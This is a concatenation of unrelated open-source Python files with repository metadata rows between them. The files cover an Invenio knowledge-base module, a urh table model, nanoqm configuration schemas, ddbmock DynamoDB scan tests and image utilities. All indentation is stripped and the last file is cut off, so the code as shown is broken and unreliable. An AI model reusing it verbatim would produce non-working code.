return json.dumps(ret)
def get_kb_mappings_embedded_json(kb_name="", key="", value="",
match_type="s", limit=None):
"""Get leftside/rightside mappings from kb kb_name formatted as json dict.
The rightside is actually considered as a json string and hence embedded
within the final result.
If key given, give only those with left side (mapFrom) = key.
If value given, give only those with right side (mapTo) = value.
:param kb_name: the name of the kb
:param key: include only lines matching this on left side in the results
:param value: include only lines matching this on right side in the results
:param match_type: s = substring match, e = exact match
:param limit: maximum number of results to return (are ALL if set to None)
:return: a list of mappings
"""
mappings = get_kb_mappings(kb_name, key, value, match_type)
ret = []
if limit is None:
limit = len(mappings)
for m in mappings[:limit]:
label = m['value'] or m['key']
value = m['key'] or m['value']
ret.append({'label': label, 'value': json.loads(value)})
return json.dumps(ret)
def kb_exists(kb_name):
"""Return True if a kb with the given name exists.
:param kb_name: the name of the knowledge base
"""
return db.session.query(
models.KnwKB.query.filter(
models.KnwKB.name.like(kb_name)).exists()).scalar()
def get_kb_name(kb_id):
"""Return the name of the kb given by id.
:param kb_id: the id of the knowledge base
"""
return get_kb_by_id(kb_id).name
@session_manager
def update_kb_attributes(kb_name, new_name, new_description=''):
"""Update kb kb_name with a new name and (optionally) description.
:param kb_name: the name of the kb to update
:param new_name: the new name for the kb
:param new_description: the new description for the kb
"""
models.KnwKB.query.filter_by(name=kb_name) \
.update({"name": new_name, "description": new_description})
def add_kb(kb_name="Untitled", kb_type=None, tries=10):
"""Add a new kb in database, return the id.
Add a new kb in database, and returns its id
The name of the kb will be 'Untitled#'
such that it is unique.
:param kb_name: the name of the kb
:param kb_type: the type of the kb, incl 'taxonomy' and 'dynamic'.
None for typical (leftside-rightside).
:param tries: exit after <n> retry
:return: the id of the newly created kb
"""
created = False
name = kb_name
i = 0
while(i < tries and created is False):
try:
kb = models.KnwKB(name=name, description="", kbtype=kb_type)
created = True
db.session.add(kb)
db.session.commit()
except IntegrityError:
db.session.rollback()
# get the highest id to calculate the new name
result = db.session.execute(
db.select([models.KnwKB.id])
.order_by(db.desc(models.KnwKB.id))
.limit(1)).first()
index = result[0] + 1 if result is not None else 1
name = kb_name + " " + str(index)
i = i + 1
created = False
except:
db.session.rollback()
raise
if created is False:
# TODO raise the right exception
raise Exception("Can't create kb \"{0}\".\n" +
"Probabily the server is busy! " +
"Try again later.".format(kb_name))
return kb.id
def add_dynamic_kb(kbname, tag, collection="", searchwith=""):
"""A convenience method."""
kb_id = add_kb(kb_name=kbname, kb_type='dynamic')
save_kb_dyn_config(kb_id, tag, searchwith, collection)
return kb_id
def save_kb_dyn_config(kb_id, field, expression, collection=None):
"""Save a dynamic knowledge base configuration.
:param kb_id: the id
:param field: the field where values are extracted
:param expression: ..using this expression
:param collection: ..in a certain collection (default is all)
"""
# check that collection exists
if collection:
collection = Collection.query.filter_by(name=collection).one()
kb = get_kb_by_id(kb_id)
kb.set_dyn_config(field, expression, collection)
def kb_mapping_exists(kb_name, key):
"""Return the information if a mapping exists.
:param kb_name: knowledge base name
:param key: left side (mapFrom)
"""
try:
kb = get_kb_by_name(kb_name)
except NoResultFound:
return False
return key in kb.kbrvals
@session_manager
def delete_kb(kb_name):
"""Delete given kb from database.
:param kb_name: knowledge base name
"""
db.session.delete(models.KnwKB.query.filter_by(
name=kb_name).one())
# Knowledge Bases Dependencies
##
def get_elements_that_use_kb(name):
# FIXME remove the obsolete function
"""Return a list of elements that call given kb.
WARNING: this routine is obsolete.
[ {'filename':"filename_1.py"
'name': "a name"
},
...
]
:return: elements sorted by name
"""
warnings.warn("The method 'get_elements_that_use_kb(name) is obsolete!'",
DeprecationWarning)
format_elements = {}
# Retrieve all elements in files
from invenio.modules.formatter.engine \
import TEMPLATE_CONTEXT_FUNCTIONS_CACHE
for element in TEMPLATE_CONTEXT_FUNCTIONS_CACHE \
.bibformat_elements().values():
path = element.__file__
filename = os.path.basename(element.__file__)
if filename.endswith(".py"):
formatf = open(path, 'r')
code = formatf.read()
formatf.close()
# Search for use of kb inside code
kb_pattern = re.compile('''
(bfo.kb)\s* #Function call
\(\s* #Opening parenthesis
[\'"]+ #Single or double quote
(?P<kb>%s) #kb
[\'"]+\s* #Single or double quote
, #comma
''' % name, re.VERBOSE | re.MULTILINE | re.IGNORECASE)
result = kb_pattern.search(code)
if result is not None:
name = ("".join(filename.split(".")[:-1])).lower()
if name.startswith("bfe_"):
name = name[4:]
format_elements[name] = {'filename': filename,
'name': name}
keys = format_elements.keys()
keys.sort()
return map(format_elements.get, keys)
### kb functions for export
def get_kbs_info(kbtype="", searchkbname=""):
"""A convenience method.
:param kbtype: type of kb -- get only kb's of this type
:param searchkbname: get only kb's where this sting appears in the name
"""
# query + order by
query = models.KnwKB.query.order_by(
models.KnwKB.name)
# filters
if kbtype:
query = query.filter_by(kbtype=kbtype)
if searchkbname:
query = query.filter_by(name=searchkbname)
return [row.to_dict() for row in query.all()]
def get_kba_values(kb_name, searchname="", searchtype="s"):
"""Return an array of values "authority file" type = just values.
:param kb_name: name of kb
:param searchname: get these values, according to searchtype
:param searchtype: s=substring, e=exact, , sw=startswith
"""
if searchtype == 's' and searchname:
searchname = '%'+searchname+'%'
if searchtype == 'sw' and searchname: # startswith
searchname = searchname+'%'
if not searchname:
searchname = '%'
query = db.session.query(models.KnwKBRVAL).join(models.KnwKB) \
.filter(models.KnwKBRVAL.m_value.like(searchname),
models.KnwKB.name.like(kb_name))
return [(k.m_value,) for k in query.all()]
def get_kbr_keys(kb_name, searchkey="", searchvalue="", searchtype='s'):
"""Return an array of keys.
:param kb_name: the name of the knowledge base
:param searchkey: search using this key
:param searchvalue: search using this value
:param searchtype: s = substring, e=exact
"""
if searchtype == 's' and searchkey:
searchkey = '%'+searchkey+'%'
if searchtype == 's' and searchvalue:
searchvalue = '%'+searchvalue+'%'
if searchtype == 'sw' and searchvalue: # startswith
searchvalue = searchvalue+'%'
if not searchvalue:
searchvalue = '%'
if not searchkey:
searchkey = '%'
query = db.session.query(models.KnwKBRVAL).join(models.KnwKB) \
.filter(models.KnwKBRVAL.m_key.like(searchkey),
models.KnwKBRVAL.m_value.like(searchvalue),
models.KnwKB.name.like(kb_name))
return [(k.m_key,) for k in query.all()]
def get_kbr_values(kb_name, searchkey="", searchvalue="", searchtype='s',
use_memoise=False):
"""Return a tuple of values from key-value mapping kb.
:param kb_name: the name of the knowledge base
:param searchkey: search using this key
:param searchvalue: search using this value
:param searchtype: s=substring; e=exact
:param use_memoise: can we memoise while doing lookups?
:type use_memoise: bool
"""
try:
if use_memoise:
kb = get_kb_by_name_memoised(kb_name)
else:
kb = get_kb_by_name(kb_name)
except NoResultFound:
return []
return list(kb.get_kbr_values(searchkey, searchvalue, searchtype))
def get_kbr_items(kb_name, searchkey="", searchvalue="", searchtype='s'):
"""Return a list of dictionaries that match the search.
:param kb_name: the name of the knowledge base
:param searchkey: search using this key
:param searchvalue: search using this value
:param searchtype: s = substring, e=exact
:return a list of dictionaries [{'key'=>x, 'value'=>y},..]
"""
kb = get_kb_by_name(kb_name)
return kb.get_kbr_items(searchkey, searchvalue, searchtype)
def get_kbd_values(kbname, searchwith=""):
"""Return a list of values by searching a dynamic kb.
:param kbname: name of the knowledge base
:param searchwith: a term to search with
"""
from invenio.legacy import search_engine
# first check that the kb in question is dynamic
kb = get_kb_by_name(kbname)
kbid = kb.id
if not kbid:
return []
kbtype = kb.kbtype
if not kbtype:
return []
if kbtype != 'd':
return []
# get the configuration so that we see what the field is
confdict = kb.kbdefs.to_dict()
if not confdict:
return []
if 'field' not in confdict:
return []
field = confdict['field']
expression = confdict['expression']
collection = ""
if 'collection' in confdict:
collection = confdict['collection']
reclist = [] # return this
if searchwith and expression:
if (expression.count('%') > 0):
expression = expression.replace("%", searchwith)
reclist = search_engine.perform_request_search(p=expression,
cc=collection)
else:
# no %.. just make a combination
expression = expression + " and " + searchwith
reclist = search_engine.perform_request_search(p=expression,
cc=collection)
else: # either no expr or no searchwith.. but never mind about searchwith
if expression: # in this case: only expression
reclist = search_engine.perform_request_search(p=expression,
cc=collection)
else:
# make a fake expression so that only records that have this field
# will be returned
fake_exp = "/.*/"
if searchwith:
fake_exp = searchwith
reclist = search_engine.perform_request_search(f=field, p=fake_exp,
cc=collection)
if reclist:
return [val for (val, dummy) in
search_engine.get_most_popular_field_values(reclist, field)]
return [] # in case nothing worked
def get_kbd_values_json(kbname, searchwith=""):
"""Return values from searching a dynamic kb as a json-formatted string.
This IS probably the method you want.
:param kbname: name of the knowledge base
:param searchwith: a term to search with
"""
res = get_kbd_values(kbname, searchwith)
return json.dumps(res)
def get_kbd_values_for_bibedit(tag, collection="", searchwith="",
expression=""):
"""Dynamically create a dynamic KB for a specific search; then destroy it.
This probably isn't the method you want.
Example1: tag=100__a : return values of 100__a
Example2: tag=100__a, searchwith=Jill: return values of 100__a that match
with Jill
Example3: tag=100__a, searchwith=Ellis, expression="700__a:*%*:
return values of 100__a for which Ellis matches some 700__a
Note: the performace of this function is ok compared to a plain
perform_request_search / get most popular fields -pair.
The overhead is about 5% with large record sets;
the lookups are the xpensive part.
:param tag: the tag like 100__a
:param collection: collection id
:param searchwith: the string to search. If empty, match all.
:param expression: the search expression for perform_request_search;
if present, '%' is substituted with /searcwith/.
If absent, /searchwith/ is searched for in /tag/.
"""
dkbname = "tmp_dynamic_"+tag+'_'+expression
kb_id = add_kb(kb_name=dkbname, kb_type='dynamic')
# get the kb name since it may be catenated by a number
# in case there are concurrent calls.
kb_name = get_kb_name(kb_id)
add_kb_mapping(kb_name, tag, expression, collection)
# now, get stuff
myvalues = get_kbd_values(kb_name, searchwith)
# the tmp dyn kb is now useless, delete it
delete_kb(kb_name)
return myvalues
def get_kbt_items(taxonomyfilename, templatefilename, searchwith=""):
"""
Get items from taxonomy file using a templatefile.
If searchwith is defined, return only items that match with it.
:param taxonomyfilename: full path+name of the RDF file
:param templatefile: full path+name of the XSLT file
:param searchwith: a term to search with
"""
if processor_type == 1:
# lxml
doc = etree.XML(taxonomyfilename)
styledoc = etree.XML(templatefilename)
style = etree.XSLT(styledoc)
result = style(doc)
strres = str(result)
del result
del style
del styledoc
del doc
elif processor_type == 2:
# libxml2 & libxslt
styledoc = libxml2.parseFile(templatefilename)
style = libxslt.parseStylesheetDoc(styledoc)
doc = libxml2.parseFile(taxonomyfilename)
result = style.applyStylesheet(doc, None)
strres = style.saveResultToString(result)
style.freeStylesheet()
doc.freeDoc()
result.freeDoc()
else:
# no xml parser found
strres = ""
ritems = []
if len(strres) == 0:
return []
else:
lines = strres.split("\n")
for line in lines:
if searchwith:
if line.count(searchwith) > 0:
ritems.append(line)
else:
if len(line) > 0:
ritems.append(line)
return ritems
def get_kbt_items_for_bibedit(kbtname, tag="", searchwith=""):
"""A simplifield, customized version of the function get_kbt_items.
Traverses an RDF document. By default returns all leaves. If
tag defined returns the content of that tag.
If searchwith defined, returns leaves that match it.
Warning! In order to make this faster, the matching field values
cannot be multi-line!
:param kbtname: name of the taxonony kb
:param tag: name of tag whose content
:param searchwith: a term to search with
"""
# get the actual file based on the kbt name
kb = get_kb_by_name(kbtname)
kb_id = kb.id
if not kb_id:
return []
# get the rdf file..
rdfname = cfg['CFG_WEBDIR'] + "/kbfiles/" + str(kb_id) + ".rdf"
if not os.path.exists(rdfname):
return []
xsl = """\
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<xsl:output method="xml" standalone="yes"
omit-xml-declaration="yes" indent="no"/>
<xsl:template match="rdf:RDF">
<foo><!--just having some tag here speeds up output by 10x-->
<xsl:apply-templates />
</foo>
</xsl:template>
<xsl:template match="*">
<!--hi><xsl:value-of select="local-name()"/></hi-->
<xsl:if test="local-name()='"""+tag+"""'">
<myout><xsl:value-of select="normalize-space(.)"/></myout>
</xsl:if>
<!--traverse down in tree!-->
<xsl:text>
</xsl:text>
<xsl:apply-templates />
</xsl:template>
</xsl:stylesheet>"""
if processor_type == 1:
styledoc = etree.XML(xsl)
style = etree.XSLT(styledoc)
doc = etree.parse(open(rdfname, 'r'))
strres = str(style(doc))
elif processor_type == 2:
styledoc = libxml2.parseDoc(xsl)
style = libxslt.parseStylesheetDoc(styledoc)
doc = libxml2.parseFile(rdfname)
result = style.applyStylesheet(doc, None)
strres = style.saveResultToString(result)
style.freeStylesheet()
doc.freeDoc()
result.freeDoc()
else:
# no xml parser found
strres = ""
ritems = []
if len(strres) == 0:
return []
else:
lines = strres.split("\n")
for line in lines:
# take only those with myout..
if line.count("<myout>") > 0:
# remove the myout tag..
line = line[9:]
line = line[:-8]
if searchwith:
if line.count(searchwith) > 0:
ritems.append(line)
else:
ritems.append(line)
return ritems
if __name__ == "__main__":
pass
| gpl-2.0 | -6,103,226,367,035,997,000 | 32.142132 | 79 | 0.607559 | false | 3.753377 | false | false | false |
jopohl/urh | src/urh/models/ProtocolTableModel.py | 1 | 2539 | from collections import defaultdict
from PyQt5.QtCore import pyqtSignal, QModelIndex, Qt
from urh import settings
from urh.models.TableModel import TableModel
from urh.signalprocessing.ProtocolAnalyzer import ProtocolAnalyzer
from urh.ui.actions.DeleteBitsAndPauses import DeleteBitsAndPauses
class ProtocolTableModel(TableModel):
ref_index_changed = pyqtSignal(int)
def __init__(self, proto_analyzer: ProtocolAnalyzer, participants, controller, parent=None):
super().__init__(participants=participants, parent=parent)
self.controller = controller # type: urh.controller.CompareFrameController.CompareFrameController
self.protocol = proto_analyzer
self.active_group_ids = [0]
@property
def diff_columns(self) -> defaultdict(set):
return self._diffs
@property
def refindex(self):
return self._refindex
@refindex.setter
def refindex(self, refindex):
if refindex != self._refindex:
self._refindex = refindex
self.update()
self.ref_index_changed.emit(self._refindex)
def refresh_fonts(self):
self.bold_fonts.clear()
self.text_colors.clear()
for i in self._diffs.keys():
for j in self._diffs[i]:
self.bold_fonts[i, j] = True
self.text_colors[i, j] = settings.DIFFERENCE_CELL_COLOR
if self._refindex >= 0:
for j in range(self.col_count):
self.text_colors[self._refindex, j] = settings.SELECTED_ROW_COLOR
def delete_range(self, min_row: int, max_row: int, start: int, end: int):
if not self.is_writeable:
return
del_action = DeleteBitsAndPauses(proto_analyzer=self.protocol, start_message=min_row, end_message=max_row,
start=start, end=end, view=self.proto_view, decoded=True,
subprotos=self.controller.protocol_list, update_label_ranges=False)
self.undo_stack.push(del_action)
def flags(self, index: QModelIndex):
if index.isValid():
alignment_offset = self.get_alignment_offset_at(index.row())
if index.column() < alignment_offset:
return Qt.ItemIsSelectable | Qt.ItemIsEnabled
if self.is_writeable:
return Qt.ItemIsEnabled | Qt.ItemIsEditable | Qt.ItemIsSelectable
else:
return Qt.ItemIsEnabled | Qt.ItemIsSelectable
else:
return Qt.NoItemFlags
| gpl-3.0 | 7,597,071,940,439,484,000 | 35.797101 | 114 | 0.634108 | false | 3.979624 | false | false | false |
dsparrow27/vortex | src/ds/vortex/nodes/conversion/toArray.py | 1 | 1063 | from ds.vortex.core import baseNode
from ds.vortex.core import plug as plugs
class ToArray(baseNode.BaseNode):
def __init__(self, name):
"""
:param name: str, the name of the node
"""
baseNode.BaseNode.__init__(self, name)
def initialize(self):
baseNode.BaseNode.initialize(self)
self.output = plugs.OutputPlug("output", self)
self.valuePlug_ = plugs.InputPlug("value", self, value=[])
self.addPlug(self.output, clean=True)
self.addPlug(self.valuePlug_, clean=True)
self.plugAffects(self.valuePlug_, self.output)
def compute(self, requestPlug):
baseNode.BaseNode.compute(self, requestPlug=requestPlug)
if not requestPlug == self.output:
return None
result = [self.valuePlug_.value]
requestPlug.value = result
requestPlug.dirty = False
return result
def getNode():
"""General function that returns our node, used to get create our node via Ui etc
:return: Node instance
"""
return ToArray
| mit | 5,942,302,473,169,311,000 | 29.371429 | 85 | 0.638758 | false | 3.837545 | false | false | false |
SCM-NV/qmworks-namd | nanoqm/workflows/schemas.py | 1 | 9939 | """Schemas to valid user input.
Index
-----
.. currentmodule:: nanoqm.workflows.schemas
.. autosummary::
{autosummary}
API
---
{autodata}
"""
__all__ = [
'schema_cp2k_general_settings',
'schema_derivative_couplings',
'schema_single_points',
'schema_distribute_absorption_spectrum',
'schema_distribute_derivative_couplings',
'schema_distribute_single_points',
'schema_absorption_spectrum',
'schema_ipr',
'schema_coop']
import os
from numbers import Real
import pkg_resources as pkg
from schema import And, Optional, Or, Schema, Use
from typing import Any, Dict, Iterable
def equal_lambda(name: str) -> And:
"""Create an schema checking that the keyword matches the expected value."""
return And(
str, Use(str.lower), lambda s: s == name)
def any_lambda(array: Iterable[str]) -> And:
"""Create an schema checking that the keyword matches one of the expected values."""
return And(
str, Use(str.lower), lambda s: s in array)
def merge(d1: Dict[str, Any], d2: Dict[str, Any]) -> Dict[str, Any]:
"""Merge two dictionaries using without modifying the original."""
x = d1.copy()
x.update(d2)
return x
#: Schema to validate the CP2K general settings
schema_cp2k_general_settings = Schema({
# "Basis set to carry out the quantum chemistry simulation"
"basis": str,
# "Pseudo-potential to carry out the quantum chemistry simulation"
"potential": str,
# Charge of the system
Optional("charge", default=0): int,
# Multiplicity
Optional("multiplicity", default=1): int,
# Specify the Cartesian components for the cell vector
"cell_parameters": Or(
Real,
lambda xs: len(xs) == 3 and isinstance(xs, list),
lambda xs: len(xs) == 3 and all(len(r) == 3 for r in xs)),
# Type of periodicity
"periodic": any_lambda(("none", "x", "y", "z", "xy", "xy", "yz", "xyz")),
# Specify the angles between the vectors defining the unit cell
Optional("cell_angles"): list,
# Path to the folder containing the basis set specifications
Optional("path_basis", default=pkg.resource_filename("nanoqm", "basis")): os.path.isdir,
# Settings describing the input of the quantum package
"cp2k_settings_main": object,
# Settings describing the input of the quantum package
# to compute the guess wavefunction"
"cp2k_settings_guess": object,
# Restart File Name
Optional("wfn_restart_file_name", default=None): Or(str, None),
# File containing the Parameters of the cell if those
# parameters change during the MD simulation.
Optional("file_cell_parameters", default=None): Or(str, None),
# Quality of the auxiliar basis cFIT
Optional("aux_fit", default="verygood"):
any_lambda(("low", "medium", "good", "verygood", "excellent")),
# executable name
Optional("executable", default="cp2k.popt"): any_lambda(
[f"cp2k.{ext}" for ext in (
# Serial single core testing and debugging
"sdbg",
# Serial general single core usage
"sopt",
# Parallel (only OpenMP), single node, multi core
"ssmp",
# Parallel (only MPI) multi-node testing and debugging
"pdbg",
# Parallel (only MPI) general usage, no threads
"popt",
# parallel (MPI + OpenMP) general usage, threading might improve scalability and memory usage
"psmp"
)])
})
#: Dictionary with the options common to all workflows
dict_general_options = {
# Number of occupied/virtual orbitals to use
Optional('active_space', default=[10, 10]): And(list, lambda xs: len(xs) == 2),
# Index of the HOMO
Optional("nHOMO"): int,
# Index of the orbitals to compute the couplings
Optional("mo_index_range"): tuple,
# "default quantum package used"
Optional("package_name", default="cp2k"): str,
# project
Optional("project_name", default="namd"): str,
# Working directory
Optional("scratch_path", default=None): Or(None, str),
# path to the HDF5 to store the results
Optional("path_hdf5", default="quantum.hdf5"): str,
# path to xyz trajectory of the Molecular dynamics
"path_traj_xyz": os.path.exists,
# Real from where to start enumerating the folders create for each point
# in the MD
Optional("enumerate_from", default=0): int,
# Ignore the warning issues by the quantum package and keep computing
Optional("ignore_warnings", default=False): bool,
# Calculate the guess wave function in either the first point of the
# trajectory or in all
Optional("calculate_guesses", default="first"):
any_lambda(("first", "all")),
# Units of the molecular geometry on the MD file
Optional("geometry_units", default="angstrom"):
any_lambda(("angstrom", "au")),
# Integration time step used for the MD (femtoseconds)
Optional("dt", default=1): Real,
# Deactivate the computation of the orbitals for debugging purposes
Optional("compute_orbitals", default=True): bool,
# General settings
"cp2k_general_settings": schema_cp2k_general_settings
}
#: Dict with input options to run a derivate coupling workflow
dict_derivative_couplings = {
# Name of the workflow to run
"workflow": equal_lambda("derivative_couplings"),
# Algorithm used to compute the derivative couplings
Optional("algorithm", default="levine"):
any_lambda(("levine", "3points")),
# Use MPI to compute the couplings
Optional("mpi", default=False): bool,
# Track the crossing between states
Optional("tracking", default=True): bool,
# Write the overlaps in ascii
Optional("write_overlaps", default=False): bool,
# Compute the overlap between molecular geometries using a dephase"
Optional("overlaps_deph", default=False): bool
}
dict_merged_derivative_couplings = merge(
dict_general_options, dict_derivative_couplings)
#: Schema to validate the input for a derivative coupling calculation
schema_derivative_couplings = Schema(
dict_merged_derivative_couplings)
#: Schema to validate the input for a job scheduler
schema_job_scheduler = Schema({
Optional("scheduler", default="slurm"):
any_lambda(("slurm", "pbs")),
Optional("nodes", default=1): int,
Optional("tasks", default=1): int,
Optional("wall_time", default="01:00:00"): str,
Optional("job_name", default="namd"): str,
Optional("queue_name", default="short"): str,
Optional("load_modules", default=""): str,
Optional("free_format", default=""): str
})
#: Input options to distribute a job
dict_distribute = {
Optional("workdir", default=os.getcwd()): str,
# Number of chunks to split the trajectory
"blocks": int,
# Resource manager configuration
"job_scheduler": schema_job_scheduler,
# General settings
"cp2k_general_settings": schema_cp2k_general_settings,
}
#: input to distribute a derivative coupling job
dict_distribute_derivative_couplings = {
# Name of the workflow to run
"workflow": equal_lambda("distribute_derivative_couplings")
}
#: Schema to validate the input to distribute a derivate coupling calculation
schema_distribute_derivative_couplings = Schema(
merge(
dict_distribute,
merge(
dict_merged_derivative_couplings,
dict_distribute_derivative_couplings)))
#: Input for an absorption spectrum calculation
dict_absorption_spectrum = {
# Name of the workflow to run
"workflow": equal_lambda("absorption_spectrum"),
# Type of TDDFT calculations. Available: sing_orb, stda, stddft
Optional("tddft", default="stda"): And(
str, Use(str.lower), lambda s: s in ("sing_orb", "stda", "stdft")),
# Interval between MD points where the oscillators are computed"
Optional("stride", default=1): int,
# description: Exchange-correlation functional used in the DFT
# calculations,
Optional("xc_dft", default="pbe"): str
}
dict_merged_absorption_spectrum = merge(
dict_general_options, dict_absorption_spectrum)
#: Schema to validate the input for an absorption spectrum calculation
schema_absorption_spectrum = Schema(dict_merged_absorption_spectrum)
dict_distribute_absorption_spectrum = {
# Name of the workflow to run
"workflow": equal_lambda("distribute_absorption_spectrum")
}
schema_distribute_absorption_spectrum = Schema(
merge(dict_distribute, merge(
dict_merged_absorption_spectrum, dict_distribute_absorption_spectrum)))
dict_single_points = {
# Name of the workflow to run
"workflow": any_lambda(("single_points", "ipr_calculation", "coop_calculation")),
# General settings
"cp2k_general_settings": schema_cp2k_general_settings
}
#: input to distribute single point calculations
dict_distribute_single_points = {
# Name of the workflow to run
"workflow": equal_lambda("distribute_single_points")
}
#: Input for a Crystal Orbital Overlap Population calculation
dict_coop = {
# List of the two elements to calculate the COOP for
"coop_elements": list}
dict_merged_single_points = merge(dict_general_options, dict_single_points)
#: Schema to validate the input of a single pointe calculation
schema_single_points = Schema(dict_merged_single_points)
#: Schema to validate the input for a Inverse Participation Ratio calculation
schema_ipr = schema_single_points
#: Input for a Crystal Orbital Overlap Population calculation
dict_merged_coop = merge(dict_merged_single_points, dict_coop)
#: Schema to validate the input for a Crystal Orbital Overlap Population calculation
schema_coop = Schema(dict_merged_coop)
#: Schema to validate the input to distribute a single point calculation
schema_distribute_single_points = Schema(
merge(dict_distribute, merge(
dict_merged_single_points, dict_distribute_single_points)))
| mit | 6,000,909,809,273,182,000 | 29.770898 | 105 | 0.683268 | false | 3.809506 | false | false | false |
dekked/dynamodb-mock | tests/functional/pyramid/test_scan.py | 1 | 4232 | # -*- coding: utf-8 -*-
import unittest, json
TABLE_NAME1 = 'Table-1'
TABLE_RT = 45
TABLE_WT = 123
TABLE_NAME = 'Table-HR'
TABLE_RT = 45
TABLE_WT = 123
TABLE_RT2 = 10
TABLE_WT2 = 10
TABLE_HK_NAME = u'hash_key'
TABLE_HK_TYPE = u'N'
TABLE_RK_NAME = u'range_key'
TABLE_RK_TYPE = u'S'
HK_VALUE1 = u'123'
HK_VALUE2 = u'456'
HK_VALUE3 = u'789'
RK_VALUE1 = u'Waldo-1'
RK_VALUE2 = u'Waldo-2'
RK_VALUE3 = u'Waldo-3'
RK_VALUE4 = u'Waldo-4'
RK_VALUE5 = u'Waldo-5'
ITEM1 = {
TABLE_HK_NAME: {TABLE_HK_TYPE: HK_VALUE1},
TABLE_RK_NAME: {TABLE_RK_TYPE: RK_VALUE1},
u'relevant_data': {u'S': u'tata'},
}
ITEM2 = {
TABLE_HK_NAME: {TABLE_HK_TYPE: HK_VALUE1},
TABLE_RK_NAME: {TABLE_RK_TYPE: RK_VALUE2},
u'relevant_data': {u'S': u'tete'},
}
ITEM3 = {
TABLE_HK_NAME: {TABLE_HK_TYPE: HK_VALUE2},
TABLE_RK_NAME: {TABLE_RK_TYPE: RK_VALUE3},
u'relevant_data': {u'S': u'titi'},
}
ITEM4 = {
TABLE_HK_NAME: {TABLE_HK_TYPE: HK_VALUE3},
TABLE_RK_NAME: {TABLE_RK_TYPE: RK_VALUE4},
u'relevant_data': {u'S': u'toto'},
}
ITEM5 = {
TABLE_HK_NAME: {TABLE_HK_TYPE: HK_VALUE3},
TABLE_RK_NAME: {TABLE_RK_TYPE: RK_VALUE5},
u'relevant_data': {u'S': u'tutu'},
}
HEADERS = {
'x-amz-target': 'dynamodb_20111205.Scan',
'content-type': 'application/x-amz-json-1.0',
}
# Goal here is not to test the full API, this is done by the Boto tests
class TestScan(unittest.TestCase):
def setUp(self):
from ddbmock.database.db import dynamodb
from ddbmock.database.table import Table
from ddbmock.database.key import PrimaryKey
from ddbmock.database.db import dynamodb
from ddbmock import main
app = main({})
from webtest import TestApp
self.app = TestApp(app)
dynamodb.hard_reset()
hash_key = PrimaryKey(TABLE_HK_NAME, TABLE_HK_TYPE)
range_key = PrimaryKey(TABLE_RK_NAME, TABLE_RK_TYPE)
self.t1 = Table(TABLE_NAME, TABLE_RT, TABLE_WT, hash_key, range_key)
dynamodb.data[TABLE_NAME] = self.t1
self.t1.put(ITEM1, {})
self.t1.put(ITEM2, {})
self.t1.put(ITEM3, {})
self.t1.put(ITEM4, {})
self.t1.put(ITEM5, {})
def tearDown(self):
from ddbmock.database.db import dynamodb
dynamodb.hard_reset()
def test_scan_condition_filter_fields(self):
from ddbmock.database.db import dynamodb
request = {
"TableName": TABLE_NAME,
"ScanFilter": {
"relevant_data": {
"AttributeValueList": [{"S":"toto"},{"S":"titi"},{"S":"tata"}],
"ComparisonOperator": "IN",
},
},
"AttributesToGet": [u'relevant_data'],
}
expected = {
u"Count": 3,
u"ScannedCount": 5,
u"Items": [
{u"relevant_data": {u"S": u"tata"}},
{u"relevant_data": {u"S": u"toto"}},
{u"relevant_data": {u"S": u"titi"}},
],
u"ConsumedCapacityUnits": 0.5,
}
# Protocol check
res = self.app.post_json('/', request, HEADERS, status=200)
self.assertEqual(expected, json.loads(res.body))
self.assertEqual('application/x-amz-json-1.0; charset=UTF-8', res.headers['Content-Type'])
def test_scan_count_and_attrs_to_get_fails(self):
from ddbmock.database.db import dynamodb
request = {
"TableName": TABLE_NAME,
"ScanFilter": {
"relevant_data": {
"AttributeValueList": [{"S":"toto"},{"S":"titi"},{"S":"tata"}],
"ComparisonOperator": "IN",
},
},
"AttributesToGet": [u'relevant_data'],
"Count": True,
}
expected = {
u'__type': u'com.amazonaws.dynamodb.v20111205#ValidationException',
u'message': u'Can not filter fields when only count is requested'
}
# Protocol check
res = self.app.post_json('/', request, HEADERS, status=400)
self.assertEqual(expected, json.loads(res.body))
self.assertEqual('application/x-amz-json-1.0; charset=UTF-8', res.headers['Content-Type'])
| lgpl-3.0 | -856,757,890,835,981,000 | 27.986301 | 98 | 0.559074 | false | 2.982382 | true | false | false |
yancz1989/cancer | utilities.py | 1 | 4491 | import SimpleITK as sitk
import numpy as np
import csv
import os
import json
from PIL import Image
import matplotlib.pyplot as plt
import SimpleITK as sitk
from cv2 import imread, imwrite
def load_itk_image(filename):
itkimage = sitk.ReadImage(filename)
numpyImage = sitk.GetArrayFromImage(itkimage)
numpyOrigin = np.array(list(reversed(itkimage.GetOrigin())))
numpySpacing = np.array(list(reversed(itkimage.GetSpacing())))
return numpyImage, numpyOrigin, numpySpacing
def readCSV(filename):
lines = []
with open(filename, "rb") as f:
csvreader = csv.reader(f)
for line in csvreader:
lines.append(line)
return lines
def voxel_2_world(voxel_coord, itkimage):
world_coord = list(reversed(
itkimage.TransformContinuousIndexToPhysicalPoint(list(reversed(voxel_coord)))))
return world_coord
def voxelCoordToWorld(voxelCoord, origin, spacing):
stretchedVoxelCoord = voxelCoord * spacing
worldCoord = stretchedVoxelCoord + origin
return worldCoord
def worldToVoxelCoord(worldCoord, origin, spacing):
stretchedVoxelCoord = np.absolute(worldCoord - origin)
voxelCoord = stretchedVoxelCoord / spacing
return voxelCoord
def normalizePlanes(npzarray):
maxHU = 400.
minHU = -1000.
npzarray = (npzarray - minHU) / (maxHU - minHU)
npzarray[npzarray > 1] = 1.
npzarray[npzarray < 0] = 0.
return npzarray
def readFileNameMap(map_filename):
file_map = {}
with open(map_filename) as map_file:
file_name_list = json.load(map_file)
for it in file_name_list:
file_map[it['ID_name']] = it['long_name']
return file_map
def parse_image_file(filename):
cols = filename.split("-")
subset = cols[0]
key = cols[1]
z_axis = int(cols[2])
return key, subset[:subset.index('/')], z_axis
def filterBoxes(boxes, threshold):
filtered_boxes = []
for box in boxes:
if box[4] >= threshold:
filtered_boxes.append(box)
return filtered_boxes
def readResultMap(result_filename, file_map, threshold):
result_map = {}
with open(result_filename) as result_file:
result_list = json.load(result_file)
for it in result_list:
filename = it['file']
key = file_map[filename]
key = os.path.splitext(key)[0]
boxes = it['box']
boxes = filterBoxes(boxes, threshold)
if not result_map.get(key):
result_map[key] = []
cols = filename.split('_')
index = int(cols[2])
result_map[key].append((index, boxes))
for key, val in result_map.iteritems():
val.sort()
return result_map
def readImageMap(filename):
lines = readCSV(filename)
result = {}
for line in lines[1:]:
worldCoord = np.asarray(
